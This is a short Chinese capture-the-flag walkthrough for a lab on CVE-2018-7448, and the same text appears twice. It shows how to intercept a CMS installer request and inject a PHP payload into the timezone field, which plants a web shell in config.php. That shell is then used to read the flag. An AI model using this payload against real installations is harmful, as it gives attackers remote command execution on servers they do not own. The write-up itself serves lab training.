1.阅读靶场介绍可以得到的就是在timezone参数中做文章2.启动靶场如下图所示3.welcome环节这里我们选择最后一个这里没提到的环节就是绿色按钮即可next4.关键Configuration Info环节这里我们填写的是localhost/cms/root/root点击next的时候启动代理然后bp抓包这里我们要把timezone的部分改为junk’;echo%20system($_GET[cmd]);junk然后forward放行再继续下面的步骤就可以啦5.Admin Account Info环节这里我们填写的是admin/1qq.com/123456/1234566.site settings环节这里随便填一个东西即可7.Finish环节到这里我们就完成安装啦然后去访问如下的url把这个加到域名后哟/cms/config.php?cmdcat%20/flaghttps://eci-2zeerodrkkv98jf7nsth.cloudeci1.ichunqiu.com/cms/config.php?cmdcat%20/flag到这里各位彦祖都完成夺旗啦感谢您的观看
春秋云境CVE-2018-7448
1.阅读靶场介绍可以得到的就是在timezone参数中做文章2.启动靶场如下图所示3.welcome环节这里我们选择最后一个这里没提到的环节就是绿色按钮即可next4.关键Configuration Info环节这里我们填写的是localhost/cms/root/root点击next的时候启动代理然后bp抓包这里我们要把timezone的部分改为junk’;echo%20system($_GET[cmd]);junk然后forward放行再继续下面的步骤就可以啦5.Admin Account Info环节这里我们填写的是admin/1qq.com/123456/1234566.site settings环节这里随便填一个东西即可7.Finish环节到这里我们就完成安装啦然后去访问如下的url把这个加到域名后哟/cms/config.php?cmdcat%20/flaghttps://eci-2zeerodrkkv98jf7nsth.cloudeci1.ichunqiu.com/cms/config.php?cmdcat%20/flag到这里各位彦祖都完成夺旗啦感谢您的观看
